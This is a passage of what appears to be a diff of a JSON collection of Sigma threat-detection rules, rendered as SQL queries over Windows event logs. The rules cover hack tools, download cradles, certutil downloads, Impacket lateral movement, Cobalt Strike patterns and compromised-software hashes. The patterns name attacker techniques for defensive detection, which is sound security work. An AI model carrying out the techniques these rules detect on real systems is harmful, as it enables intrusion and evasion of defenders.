'330768a4f172e10acb6287b87289d83b')" - ], - "filename": "image_load_hktl_sharpevtmute.yml" - }, - { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "False positive are expected with legitimate sources" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unknown" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Write Protect For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", + "attack.t1047", "attack.lateral_movement", - "attack.t1072" + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", + "description": "Detects creation of a scheduled task with a GUID like name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Legitimate software naming their tasks as GUIDs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "status": "test", + "description": "Detects a service binary running in a suspicious directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": 